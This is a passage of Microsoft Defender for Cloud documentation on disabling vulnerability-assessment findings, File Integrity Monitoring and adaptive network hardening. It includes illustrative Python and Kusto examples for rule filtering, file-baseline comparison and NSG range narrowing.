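    """One disable rule. A finding is disabled when it matches ANY populated
    criterion, mirroring the pane text 'Disable findings that match any of the
    following criteria'. Unset criteria are ignored."""
    ids: set = field(default_factory=set)
    categories: set = field(default_factory=set)
    security_check_text: list = field(default_factory=list)  # case-insensitive substrings
    cvss2_less_than: Optional[float] = None
    cvss3_less_than: Optional[float] = None
    minimum_severity: Optional[str] = None   # findings BELOW this severity are disabled
    non_patchable: bool = False              # disable findings with no available patch


def disable_reason(rule: DisableRule, f: Finding) -> Optional[str]:
    """Name of the first criterion that disables the finding, or None if it stays active."""
    if f.finding_id in rule.ids:
        return "id"
    if f.category in rule.categories:
        return "category"
    if any(t.lower() in f.security_check.lower() for t in rule.security_check_text):
        return "security_check_text"
    if rule.cvss2_less_than is not None and f.cvss2 < rule.cvss2_less_than:
        return "cvss2"
    if rule.cvss3_less_than is not None and f.cvss3 < rule.cvss3_less_than:
        return "cvss3"
    if rule.minimum_severity and SEVERITY_RANK[f.severity] < SEVERITY_RANK[rule.minimum_severity]:
        return "severity"
    if rule.non_patchable and not f.patchable:
        return "non_patchable"
    return None


def apply_rule(findings, rule):
    """Split findings into those still counted toward the secure score and a
    {finding_id: reason} map of the ones the rule hides."""
    active, disabled = [], {}
    for f in findings:
        why = disable_reason(rule, f)
        if why:
            disabled[f.finding_id] = why
        else:
            active.append(f)
    return active, disabled


def hidden_severe(findings, disabled, floor="High"):
    """Review check: High/Critical findings that the rule would silently hide."""
    return [f.finding_id for f in findings
            if f.finding_id in disabled and SEVERITY_RANK[f.severity] >= SEVERITY_RANK[floor]]


# Constructed sample findings (not real scanner output).
SAMPLE_FINDINGS = [
    Finding("F-1", "CentOS", "CentOS Security Update for sudo", "High", 7.2, 7.8, True),
    Finding("F-2", "Microsoft Windows", "Microsoft Windows Security Update", "Critical", 9.3, 9.8, True),
    Finding("F-3", "Microsoft Windows", "Windows information disclosure (no patch)", "Low", 2.1, 3.1, False),
    Finding("F-4", "RedHat", "RedHat Update for openssl", "Medium", 5.0, 7.5, True),
    Finding("F-5", "RedHat", "RedHat Update for curl", "Medium", 6.0, 6.4, True),
]

# A rule built from the scenarios listed on the page: hide the sudo advisory text,
# anything with CVSS v3 below 6.5, anything below Medium, and non-patchable items.
SAMPLE_RULE = DisableRule(
    security_check_text=["CentOS Security Update for sudo"],
    cvss3_less_than=6.5,
    minimum_severity="Medium",
    non_patchable=True,
)

if __name__ == "__main__":
    active, disabled = apply_rule(SAMPLE_FINDINGS, SAMPLE_RULE)
    print("still counted:", [f.finding_id for f in active])        # ['F-2', 'F-4']
    print("disabled:", disabled)
    print("severe findings hidden by this rule:", hidden_severe(SAMPLE_FINDINGS, disabled))  # ['F-1']
```

The point of hidden_severe is the caveat: a substring criterion such as "CentOS Security Update for sudo" matches regardless of severity, so a High finding (F-1) disappears from the score alongside the low-value noise. Review that list before selecting Apply rule, and record the reason in the Justification field.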


Export the results 


To export vulnerability assessment results, you'll need to use Azure Resource Graph (ARG). This tool provides instant access to resource information across your cloud environments with robust filtering, grouping, and sorting capabilities. It's a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal.

For full instructions and a sample ARG query, see the following Tech Community post: Exporting vulnerability assessment results in Microsoft Defender for Cloud.


Next steps 


This article described the Microsoft Defender for Cloud vulnerability assessment extension (powered by Qualys) for scanning your VMs. For related material, see the following articles:

- Learn about the different elements of a recommendation
- Learn how to remediate recommendations


File Integrity Monitoring using the Log 
Analytics agent 


Article • 05/10/2023


To provide File Integrity Monitoring (FIM), the Log Analytics agent uploads data about the monitored files, registry keys and other entities to the Log Analytics workspace. By comparing the current state of those entities with their state during the previous scan, FIM notifies you if suspicious modifications have been made.


Note

As the Log Analytics agent (also known as MMA) is set to retire in August 2024, all Defender for Servers features that currently depend on it, including those described on this page, will be available through either Microsoft Defender for Endpoint integration or agentless scanning before the retirement date. For more information about the roadmap for each of the features that currently rely on the Log Analytics agent, see this announcement.


In this article, you'll learn how to:

- Enable File Integrity Monitoring with the Log Analytics agent
- Disable File Integrity Monitoring
- Monitor workspaces, entities, and files
- Compare baselines using File Integrity Monitoring


Note

File Integrity Monitoring may create the following account on monitored SQL Servers: NT Service\HealthService

If you delete the account, it will be automatically recreated.


Availability

Release state: General availability (GA)

Pricing: Requires Microsoft Defender for Servers Plan 2. Using the Log Analytics agent, FIM uploads data to the Log Analytics workspace. Data charges apply, based on the amount of data you upload. See Log Analytics pricing to learn more.

Required roles and permissions: Workspace owner can enable/disable FIM (for more information, see Azure Roles for Log Analytics). Reader can view results.

Clouds:
- Supported: Commercial clouds
- National (Azure Government, Microsoft Azure operated by 21Vianet): supported only in regions where Azure Automation's change tracking solution is available
- Supported: Azure Arc enabled devices. See Supported regions for linked Log Analytics workspace. Learn more about change tracking.
- Not supported: Connected AWS accounts


Enable File Integrity Monitoring with the Log 
Analytics agent 


FIM is only available from Defender for Cloud's pages in the Azure portal. There's 
currently no REST API for working with FIM. 


1. From the Workload protections dashboard's Advanced protection area, select File 
integrity monitoring. 


[Screenshot: the Workload protections dashboard. The Advanced protection area lists VM vulnerability assessment, Just-in-time VM access, Adaptive application control, Container image scanning, Adaptive network hardening, SQL vulnerability assessment, File integrity monitoring, Network map and IoT security, each with its count of unprotected resources.]


The following information is provided for each workspace:

- Total number of changes that occurred in the last week (you may see a dash "-" if FIM isn't enabled on the workspace)
- Total number of computers and VMs reporting to the workspace
- Geographic location of the workspace
- Azure subscription that the workspace is under


2. Use this page to:

   - Access and view the status and settings of each workspace
   - Upgrade the workspace to use enhanced security features. This icon indicates that the workspace or subscription isn't protected with Microsoft Defender for Servers. To use the FIM features, your subscription must be protected with this plan. Learn about how to enable Defender for Servers.
   - Enable FIM on all machines under the workspace and configure the FIM options. This icon indicates that FIM isn't enabled for the workspace.

   If there's no enable or upgrade button, and the space is blank, it means that FIM is already enabled on the workspace.
[Screenshot: the File Integrity Monitoring page listing workspaces with the columns Workspace Name, Total changes, Total servers, Location and Subscription. Each row ends with UPGRADE PLAN or ENABLE, or is blank when FIM is already enabled on that workspace.]


3. Select ENABLE. The details of the workspace, including the number of Windows and Linux machines under the workspace, are shown.


[Screenshot: the Enable File Integrity Monitoring pane for a workspace. It warns that enabling FIM affects all machines connected to the selected workspace, shows the count of Windows and Linux servers, lists the Recommended settings (Windows Files, Registry, Linux Files) that can be expanded, notes that FIM uploads data to the Log Analytics workspace and that data charges apply, and states that FIM uses the Change Tracking solution enabled on the workspace.]


The recommended settings for Windows and Linux are also listed. Expand 
Windows files, Registry, and Linux files to see the full list of recommended items. 


4. Clear the checkboxes for any recommended entities you don't want to be 
monitored by FIM. 


5. Select Apply file integrity monitoring to enable FIM. 


You can change the settings at any time. Learn more about editing monitored entities. 


Disable File Integrity Monitoring 


FIM uses the Azure Change Tracking solution to track and identify changes in your 
environment. By disabling FIM, you remove the Change Tracking solution from selected 
workspace. 


To disable FIM: 


1. From the File Integrity Monitoring dashboard for a workspace, select Disable. 


[Screenshot: the FIM dashboard for a workspace, with the toolbar Settings, Refresh, Filter and Disable; summary tiles for Total servers, Total changes, Change type (Files/Registry) and Change category (Modified/Added/Removed); and the Servers and Changes tabs.]


2. Select Remove. 


Monitor workspaces, entities, and files 


Audit monitored workspaces 


The File integrity monitoring dashboard displays for workspaces where FIM is enabled. 
The FIM dashboard opens after you enable FIM on a workspace or when you select a 
workspace in the file integrity monitoring window that already has FIM enabled. 


[Screenshot: the FIM dashboard for a workspace. The Servers tab lists each machine with Total changes, Files, Registry and Last change time.]


The FIM dashboard for a workspace displays the following details:

- Total number of machines connected to the workspace
- Total number of changes that occurred during the selected time period
- A breakdown of change type (files, registry)
- A breakdown of change category (modified, added, removed)

Select Filter at the top of the dashboard to change the time period for which changes are shown.


[Screenshot: the Filter menu on the FIM dashboard, offering the time ranges Last 30 Minutes, Last 1 Hour, Last 6 Hours, Last 24 Hours, Last 7 Days and Last 30 Days.]


The Servers tab lists the machines reporting to this workspace. For each machine, the 
dashboard lists: 


e Total changes that occurred during the selected period of time 
e A breakdown of total changes as file changes or registry changes 


When you select a machine, the query appears along with the results that identify the 
changes made during the selected time period for the machine. You can expand a 
change for more information. 


[Screenshot: the Log Analytics query that opens for the selected machine, together with its results (14 registry Added/Removed records for the machine vmtest):

ConfigurationChange
| where Computer == "<machine name>"
| where ConfigChangeType in ("Files", "Registry")
| order by TimeGenerated
| render table]


The Changes tab (shown below) lists all changes for the workspace during the selected time period. For each entity that was changed, the dashboard lists the:

- Machine that the change occurred on
- Type of change (registry or file)
- Category of change (modified, added, removed)
- Date and time of change


[Screenshot: the Changes tab, listing for each changed entity (registry keys under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\hivelist in this example) the server, the type (Registry), the category (Added or Removed) and the change time.]


Change details opens when you enter a change in the search field or select an entity listed under the Changes tab.


[Screenshot: the Change details pane for a registry entity. For each property (SourceComputerId, RegistryKey, Hive, ValueName, ValueData, ValueType, Size, Acls, SourceSystem, MG, ManagementGroupName, TenantId, VMUUID) it shows the value before and the value after the change; unchanged properties are collapsed.]


Edit monitored entities


1. From the File Integrity Monitoring dashboard for a workspace, select Settings from the toolbar.


[Screenshot: the FIM dashboard for a workspace, with Settings highlighted on the toolbar.]


Workspace Configuration opens with tabs for each type of element that can be monitored:

- Windows registry
- Windows files
- Linux Files
- File content
- Windows services

Each tab lists the entities that you can edit in that category. For each entity listed, Defender for Cloud identifies whether FIM is enabled (true) or not enabled (false). Edit the entity to enable or disable FIM.


[Screenshot: Workspace Configuration (Change Tracking), Windows Registry tab, with the columns Group, Enabled, Registry Key and Recursive. Recommended entries under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer... and HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\... are listed with Enabled = false and Recursive = true; Security entries under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID..., ...\Windows NT\Curre... and ...\Windows\CurrentV... are listed with Enabled = true and Recursive = false.]


2. Select an entry from one of the tabs and edit any of the available fields in the Edit for Change Tracking pane. Options include:

   - Enable (True) or disable (False) file integrity monitoring
   - Provide or change the entity name
   - Provide or change the value or path
   - Delete the entity


3. Discard or save your changes. 


Add a new entity to monitor 


1. From the File Integrity Monitoring dashboard for a workspace, select Settings 
from the toolbar. 


The Workspace Configuration opens. 
2. On the Workspace Configuration: 


a. Select the tab for the type of entity that you want to add: Windows registry, 
Windows files, Linux Files, file content, or Windows services. 


b. Select Add. 


In this example, we selected Linux Files. 


[Screenshot: Workspace Configuration, Linux Files tab, with the columns Group, Enabled, Path, Type, Links, Recursive, Sudo and Upload file. The Recommended entry is /etc/*.conf (Enabled true, Type File, Links Follow, Recursive true, Sudo true, Upload file 100).]


3. Select Add. Add for Change Tracking opens. 


4. Enter the necessary information and select Save. 


Folder and path monitoring using wildcards 


Use wildcards to simplify tracking across directories. The following rules apply when you configure folder monitoring using wildcards:

- Wildcards are required for tracking multiple files.
- Wildcards can only be used in the last segment of a path, such as C:\folder\*.log or /etc/*.conf.
- If an environment variable includes a path that isn't valid, validation succeeds but the path fails when inventory runs.
- When setting the path, avoid general paths such as c:\*.*, which results in too many folders being traversed.
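One way to check candidate path entries against these rules before saving them, as an added example (not Microsoft's code; the portal performs its own validation and this does not reproduce it). The environment-variable syntaxes handled, the distinction between rejected entries and accepted-but-risky ones, and the sample paths are assumptions made for the illustration.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# %NAME% (Windows) and $NAME / ${NAME} (Linux) environment references.
_ENV_REF = re.compile(r"%([^%\\/]+)%|\$\{(\w+)\}|\$(\w+)")


@dataclass
class PathCheck:
    expanded: str
    valid: bool = True                            # would the entry pass validation?
    errors: list = field(default_factory=list)    # reasons it is rejected
    warnings: list = field(default_factory=list)  # accepted, but likely to misbehave when inventory runs


def expand_env(path: str, env: dict) -> str:
    """Resolve %VAR%, $VAR and ${VAR}; names missing from env are left untouched."""
    def sub(m):
        name = m.group(1) or m.group(2) or m.group(3)
        return env.get(name, m.group(0))
    return _ENV_REF.sub(sub, path)


def check_monitor_path(path: str, env: Optional[dict] = None) -> PathCheck:
    """Apply the wildcard rules from the page to one monitored-path entry."""
    expanded = expand_env(path, env or {})
    result = PathCheck(expanded=expanded)
    sep = "\\" if "\\" in expanded else "/"
    segments = expanded.split(sep)
    last = segments[-1]

    # Rule: a wildcard may appear only in the last segment of the path.
    for seg in segments[:-1]:
        if any(ch in seg for ch in "*?"):
            result.errors.append(f"wildcard in non-final segment '{seg}'")

    # Rule: tracking more than one file needs a wildcard; a plain path is one file.
    if not any(ch in last for ch in "*?"):
        result.warnings.append("no wildcard: only this one file is tracked")

    # Rule: avoid entries like c:\*.* that traverse an entire volume.
    parents = [s for s in segments[:-1] if s]
    if last in ("*", "*.*") and len(parents) <= 1:
        result.errors.append(f"'{expanded}' is too broad: it would traverse the whole volume")

    # Rule: an unresolved environment variable passes validation but the path
    # fails when inventory runs, so it is a warning rather than an error.
    if _ENV_REF.search(expanded):
        result.warnings.append("unresolved environment variable; inventory will fail at run time")

    result.valid = not result.errors
    return result


if __name__ == "__main__":
    # Constructed sample entries.
    for p in [r"C:\folder\*.log", "/etc/*.conf", r"C:\*\app\config.ini", r"c:\*.*",
              r"%ProgramData%\app\*.log", r"%MISSING%\app\*.log"]:
        r = check_monitor_path(p, {"ProgramData": r"C:\ProgramData"})
        print(f"{p:28} valid={r.valid} errors={r.errors} warnings={r.warnings}")
```

Treat the warnings as review items rather than noise: an entry that resolves an environment variable to an empty or wrong path is accepted by validation, so the gap shows up only as a silent absence of change records for that path.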


Compare baselines using File Integrity 
Monitoring 


File Integrity Monitoring (FIM) informs you when changes occur to sensitive areas in your resources, so you can investigate and address unauthorized activity. FIM monitors Windows files, Windows registries, and Linux files.
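The baseline comparison that underlies FIM, as an added example (this is not Microsoft's code or the Change Tracking solution; it runs against a temporary directory built inline, and the fingerprint fields, the entry format and the sample files are assumptions). A snapshot records a content hash, size and permission bits for every file matched by the monitored entries, and the diff classifies each difference as Added, Removed or Modified with the before and after values, which is the same breakdown the FIM dashboard and the ConfigurationChange table present.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path


def fingerprint(path: Path) -> dict:
    """What is compared between scans: content hash, size and permission bits."""
    st = path.lstat()
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return {"sha256": h.hexdigest(), "size": st.st_size, "mode": oct(stat.S_IMODE(st.st_mode))}


def snapshot(root, entries) -> dict:
    """Build a baseline {relative path: fingerprint} for every regular file matched by
    the monitored entries, each given as (glob pattern, recursive) like a FIM setting."""
    root = Path(root)
    files = {}
    for pattern, recursive in entries:
        for p in root.glob(f"**/{pattern}" if recursive else pattern):
            if p.is_file() and not p.is_symlink():
                files[p.relative_to(root).as_posix()] = fingerprint(p)
    return files


def diff_snapshots(before: dict, after: dict) -> list:
    """Classify every difference as Added, Removed or Modified, with before/after values."""
    changes = []
    for rel in sorted(set(before) | set(after)):
        if rel not in before:
            changes.append({"entity": rel, "category": "Added", "before": None, "after": after[rel]})
        elif rel not in after:
            changes.append({"entity": rel, "category": "Removed", "before": before[rel], "after": None})
        elif before[rel] != after[rel]:
            changed = sorted(k for k in before[rel] if before[rel][k] != after[rel][k])
            changes.append({"entity": rel, "category": "Modified", "changed": changed,
                            "before": before[rel], "after": after[rel]})
    return changes


def demo() -> list:
    """Constructed scenario in a temp dir: take a baseline, make four tampering-style
    changes, and return what a second scan reports."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        (root / "bin").mkdir()
        (root / "etc" / "sshd.conf").write_text("PermitRootLogin no\n")
        (root / "etc" / "hosts.conf").write_text("127.0.0.1 localhost\n")
        (root / "bin" / "agent").write_bytes(b"\x7fELF-placeholder")
        os.chmod(root / "bin" / "agent", 0o755)
        entries = [("etc/*.conf", True), ("bin/*", False)]   # like the /etc/*.conf recommended entry
        baseline = snapshot(root, entries)

        (root / "etc" / "sshd.conf").write_text("PermitRootLogin yes\n")   # content modified
        (root / "etc" / "hosts.conf").unlink()                            # removed
        (root / "etc" / "new.conf").write_text("x=1\n")                   # added
        os.chmod(root / "bin" / "agent", 0o4755)                          # setuid bit added (POSIX only)
        return diff_snapshots(baseline, snapshot(root, entries))


if __name__ == "__main__":
    for c in demo():
        print(c["category"], c["entity"], c.get("changed", ""))
```

The mode comparison is what catches the setuid change on bin/agent even though its content hash is unchanged; a hash-only baseline would miss it, which is why the page's Change details pane carries Acls alongside Size and the registry values.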


Enable built-in recursive registry checks 


The FIM registry hive defaults provide a convenient way to monitor recursive changes within common security areas. For example, an adversary may configure a script to execute in the LOCAL_SYSTEM context by registering it to run at startup or shutdown. To monitor changes of this type, enable the built-in check.

[Screenshot: Workspace Configuration, Windows Registry tab. The Recommended group includes the following keys, Enabled = false by default:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions]

Note

Recursive checks apply only to recommended security hives and not to custom registry paths.


Add a custom registry check 


FIM baselines start by identifying characteristics of a known-good state for the operating system and supporting application. For this example, we'll focus on the machine account password and secure channel settings (Netlogon parameters) for Windows Server 2008 and higher.

Policy Name | Registry Setting
Domain controller: Refuse machine account password changes | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RefusePasswordChange
Domain member: Digitally encrypt or sign secure channel data (always) | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal
Domain member: Digitally encrypt secure channel data (when possible) | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SealSecureChannel
Domain member: Digitally sign secure channel data (when possible) | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\SignSecureChannel
Domain member: Disable machine account password changes | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange
Domain member: Maximum machine account password age | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\MaximumPasswordAge
Domain member: Require strong (Windows 2000 or later) session key | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireStrongKey
Network security: Restrict NTLM: NTLM authentication in this domain | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RestrictNTLMInDomain
Network security: Restrict NTLM: Add server exceptions in this domain | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DCAllowedNTLMServers
Network security: Restrict NTLM: Audit NTLM authentication in this domain | MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\AuditNTLMInDomain

Note

To learn more about registry settings supported by various operating system versions, refer to the Group Policy Settings reference spreadsheet.


To configure FIM to monitor registry baselines:

1. In the Add Windows Registry for Change Tracking window, select the Windows Registry Key text box.

2. Enter the following registry key:

```reg
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters
```


[Screenshot: the Add Windows Registry for Change Tracking pane, with Enabled set, Group = Custom and Windows Registry Key = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters.]


Track changes to Windows files 


1. In the Add Windows File for Change Tracking window, in the Enter path text box, enter the folder that contains the files that you want to track. In the example in the following figure, Contoso Web App resides on the D:\ drive within the ContosoWebApp folder structure.

2. Create a custom Windows file entry by providing a name for the setting class, enabling recursion, and specifying the top folder with a wildcard (*) suffix.


[Screenshot: the Add Windows File for Change Tracking pane, with the fields Item Name, Group (Custom), Enter Path, Path Type (File), Recursion (True/False) and Upload file content (True/False).]


Retrieve change data 


File Integrity Monitoring data is stored in the ConfigurationChange table of the Log Analytics workspace.

1. Set a time range to retrieve a summary of changes by resource.

   In the following example, we're retrieving all changes in the last 14 days in the categories of registry and files:

```kusto
ConfigurationChange
| where TimeGenerated > ago(14d)
| where ConfigChangeType in ('Registry', 'Files')
| summarize count() by Computer, ConfigChangeType
```

2. To view details of the registry changes:
   a. Remove Files from the where clause.
   b. Remove the summarization line and replace it with an ordering clause:

```kusto
ConfigurationChange
| where TimeGenerated > ago(14d)
| where ConfigChangeType in ('Registry')
| order by Computer, RegistryKey
```

Reports can be exported to CSV for archival and/or channeled to a Power BI report.


[Screenshot: Log Analytics results for the registry query above on the workspace contosoretail-it, showing Registry/Modified rows for the computer retailEUS3, and the Export menu with Export to CSV - All Columns, Export to CSV - Displayed Columns and Export to Power BI (M Query).]


Next steps 


Learn more about Defender for Cloud in: 


- Setting security policies - Learn how to configure security policies for your Azure subscriptions and resource groups.
- Managing security recommendations - Learn how recommendations help you protect your Azure resources.
- Azure Security blog - Get the latest Azure security news and information.


Improve your network security posture 
with adaptive network hardening 


Article • 06/19/2023


Adaptive network hardening is an agentless feature of Microsoft Defender for Cloud - 
nothing needs to be installed on your machines to benefit from this network hardening 
tool. 


This page explains how to configure and manage adaptive network hardening in 
Defender for Cloud. 


Availability 


Release state: General availability (GA)

Pricing: Requires Microsoft Defender for Servers Plan 2

Required roles and permissions: Write permissions on the machine's NSGs

Clouds:
- Supported: Commercial clouds
- Not supported: National (Azure Government, Azure China 21Vianet)
- Not supported: Connected AWS accounts


What is adaptive network hardening? 


Applying network security groups (NSGs) to filter traffic to and from resources improves your network security posture. However, there can still be cases in which the actual traffic flowing through the NSG is only a subset of what the NSG rules allow. In these cases, the security posture can be improved further by hardening the NSG rules based on the actual traffic patterns.

Adaptive network hardening provides recommendations to further harden the NSG rules. It uses a machine learning algorithm that factors in actual traffic, known trusted configuration, threat intelligence, and other indicators of compromise, and then provides recommendations to allow traffic only from specific IP/port tuples.

For example, let's say the existing NSG rule allows traffic from 140.20.30.10/24 on port 22. Based on traffic analysis, adaptive network hardening might recommend narrowing the range to allow traffic only from 140.20.30.10/29 (a /29 inside the original /24), and deny all other traffic to that port. For the full list of supported ports, see the common questions entry Which ports are supported?.
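The narrowing step in the example above, as an added example (this is not Microsoft's algorithm, which also weighs threat intelligence and trusted configuration; this version uses only observed flows). It computes the smallest CIDR block covering the sources seen on a port over the observation window, refuses to recommend anything with fewer than the 30 days of traffic data the page says are required, and flags later flows from outside the recommended range the way the Alerts tab does. The Flow type, the sample flows and the choice to recommend a deny rule when no traffic was seen on a port are constructed assumptions.

```python
import ipaddress
from dataclasses import dataclass

MIN_DAYS_OF_TRAFFIC = 30   # recommendations need at least 30 days of traffic data


@dataclass(frozen=True)
class Flow:
    src: str        # observed source address
    dst_port: int   # destination port on the VM


def covering_prefix(addresses):
    """Smallest single CIDR block that contains every observed source address."""
    addrs = sorted(ipaddress.ip_address(a) for a in addresses)
    low, high = addrs[0], addrs[-1]
    prefixlen = low.max_prefixlen
    while True:
        net = ipaddress.ip_network(f"{low}/{prefixlen}", strict=False)
        if high in net:
            return net
        prefixlen -= 1


def recommend(existing_cidr, port, flows, days_observed):
    """Return (action, network): 'not enough data'; 'deny' when no traffic was seen on
    the port (the portal shows such a rule with source range None); 'narrow' with the
    proposed tighter range; or 'keep' when observed traffic already spans the rule."""
    if days_observed < MIN_DAYS_OF_TRAFFIC:
        return "not enough data", None
    existing = ipaddress.ip_network(existing_cidr, strict=False)
    sources = {f.src for f in flows if f.dst_port == port}
    if not sources:
        return "deny", None
    proposed = covering_prefix(sources)
    if proposed.subnet_of(existing) and proposed.prefixlen > existing.prefixlen:
        return "narrow", proposed
    return "keep", existing


def alerts(recommended, port, flows):
    """Flows to the port whose source is outside the recommended range; these are what
    the Alerts tab would list once the narrowed rule is in place."""
    return [f for f in flows
            if f.dst_port == port and ipaddress.ip_address(f.src) not in recommended]


# Constructed 45-day observation: SSH from five hosts in 140.20.30.8-13, HTTPS from one other.
OBSERVED = [Flow("140.20.30.8", 22), Flow("140.20.30.9", 22), Flow("140.20.30.10", 22),
            Flow("140.20.30.11", 22), Flow("140.20.30.13", 22), Flow("140.20.30.77", 443)]

if __name__ == "__main__":
    action, net = recommend("140.20.30.10/24", 22, OBSERVED, days_observed=45)
    print(action, net)                                  # narrow 140.20.30.8/29
    later = OBSERVED + [Flow("140.20.30.200", 22)]
    print([f.src for f in alerts(net, 22, later)])      # ['140.20.30.200']
```

Note what the covering block does not do: 140.20.30.12 was never seen but sits inside the /29 and is still allowed, so a recommended range is a tightening of the existing rule, not an allow-list of exactly the hosts observed. Review the proposed ranges against your own knowledge of the clients before selecting Enforce.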


View hardening alerts and recommended rules 


1. From Defender for Cloud's menu, open the Workload protections dashboard. 


2. Select the adaptive network hardening tile (1), or the insights panel item related to adaptive network hardening (2).


[Screenshot: the Workload protections dashboard. The Advanced protection area contains the Adaptive network hardening tile (1); the insights panel contains an "Enable adaptive network hardening" item reporting that adaptive network hardening is enabled on 90% of VMs (2).]
Tip

The insights panel shows the percentage of your VMs currently defended with adaptive network hardening.


3. The details page for the Adaptive Network Hardening recommendations should be applied on internet facing virtual machines recommendation opens with your network VMs grouped into three tabs:

   - Unhealthy resources: VMs that currently have recommendations and alerts that were triggered by running the adaptive network hardening algorithm.
   - Healthy resources: VMs without alerts and recommendations.
   - Unscanned resources: VMs that the adaptive network hardening algorithm cannot be run on because of one of the following reasons:
     - VMs are Classic VMs: Only Azure Resource Manager VMs are supported.
     - Not enough data is available: In order to generate accurate traffic hardening recommendations, Defender for Cloud requires at least 30 days of traffic data.
     - VM is not protected by Microsoft Defender for Servers: Only VMs protected with Microsoft Defender for Servers are eligible for this feature.

[Screenshot: the recommendation Adaptive Network Hardening recommendations should be applied on internet facing virtual machines (Severity: High, Freshness interval: 24 Hours), with the tabs Unhealthy resources (7), Healthy resources (80) and Not applicable resources (16) listing VMs by name and subscription.]


4. From the Unhealthy resources tab, select a VM to view its alerts and the
recommended hardening rules to apply.

- The Rules tab lists the rules that adaptive network hardening recommends
you add.

- The Alerts tab lists the alerts that were generated by traffic flowing to
the resource from outside the IP ranges allowed in the recommended
rules.


5. Optionally, edit the rules:

- Modify a rule
- Delete a rule
- Add a rule

6. Select the rules that you want to apply on the NSG, and select Enforce.


Tip

If the allowed source IP ranges show as 'None', the recommended rule is a deny
rule; otherwise, it is an allow rule.


[Screenshot: the Manage Adaptive Network Hardening recommendations page for one VM (Recommended rules: 15, Total alerts: 59, with an Add rule button). The Rules tab lists a System Generated rule with destination port 22, Allowed Source IP Ranges None, protocol TCP and 5 total alerts; an Alerts tab sits beside it.]


Note

The enforced rules are added to the NSG(s) protecting the VM. (A VM could
be protected by an NSG that is associated to its NIC, or the subnet in which
the VM resides, or both.)


Modify a rule

You may want to modify the parameters of a rule that has been recommended. For
example, you may want to change the recommended IP ranges.

Some important guidelines for modifying an adaptive network hardening rule:

- You cannot change allow rules to become deny rules.
- You can modify the parameters of allow rules only.

Creating and modifying "deny" rules is done directly on the NSG. For more
information, see Create, change, or delete a network security group.

- A Deny all traffic rule is the only type of "deny" rule that would be listed here, and
it cannot be modified. You can, however, delete it (see Delete a rule). To learn
about this type of rule, see the common questions entry When should I use a
"Deny all traffic" rule?.


To modify an adaptive network hardening rule:

1. To modify some of the parameters of a rule, in the Rules tab, select the three
dots (...) at the end of the rule's row, and select Edit.


[Screenshot: Home > Microsoft Defender for Cloud - Overview > Networking > Harden Network Security Group rules of internet facing virtual machines > Manage Adaptive Network Hardening recommendations (Recommended rules: 43, Total alerts: 2). In the Rules tab the row menu of a rule is open, showing the Edit option; the list includes System Generated deny rules, MicrosoftDefenderforCloud-ANCRule_3389_TCP_Inbound_ALLOW_1551874842891 on port 3389, and an allow rule with source 180.212.35.10/30 on TCP/UDP. An Enforce button is at the bottom.]


2. In the Edit rule window, update the details that you want to change, and select
Save.

Note

After selecting Save, you have successfully changed the rule. However, you
have not applied it to the NSG. To apply it, you must select the rule in the list,
and select Enforce (as explained in the next step).


[Screenshot: Home > Microsoft Defender for Cloud - Overview > Networking > Harden Network Security Group rules of internet facing virtual machines > Manage Adaptive Network Hardening recommendations > Edit rule. The Edit rule pane is open beside the rule list, whose columns are Destination port, Allowed source IP ranges, Protocol and Alerts.]


3. To apply the updated rule, from the list, select the updated rule and select Enforce. 


[Screenshot: the Rules tab with the updated rule (Rule1) selected alongside the System Generated rules, ready for Enforce.]


Add a new rule

You can add an "allow" rule that was not recommended by Defender for Cloud.

Note

Only "allow" rules can be added here. If you want to add "deny" rules, you can do
so directly on the NSG. For more information, see Create, change, or delete a
network security group.


To add an adaptive network hardening rule: 


1. From the top toolbar, select Add rule. 


[Screenshot: Home > Microsoft Defender for Cloud - Overview > Networking > Harden Network Security Group rules of internet facing virtual machines > Manage adaptive network hardening recommendations (Recommended rules: 43, Total alerts: 2), with Add rule in the top toolbar. The Rules tab lists System Generated rules on ports 22 and 1128 (Allowed Source IP Ranges None, TCP), MicrosoftDefenderforCloud-ANCRule_3389_TCP_Inbound_ALLOW_1551874842891 on port 3389 (167.220.196.245, TCP), and Allow_DC_Manager on port 5506 (180.212.35.10/30, TCP/UDP).]


2. In the New rule window, enter the details and select Add.

Note

After selecting Add, you have successfully added the rule, and it is listed with
the other recommended rules. However, you have not applied it on the NSG.
To activate it, you must select the rule in the list, and select Enforce (as
explained in the next step).

3. To apply the new rule, from the list, select the new rule and select Enforce.


[Screenshot: the Rules tab with the newly added rule selected alongside the System Generated rules, ready for Enforce.]


Delete a rule

When necessary, you can delete a recommended rule for the current session. For
example, you may determine that applying a suggested rule could block legitimate
traffic.

To delete an adaptive network hardening rule for your current session:

- In the Rules tab, select the three dots (...) at the end of the rule's row, and select
Delete.


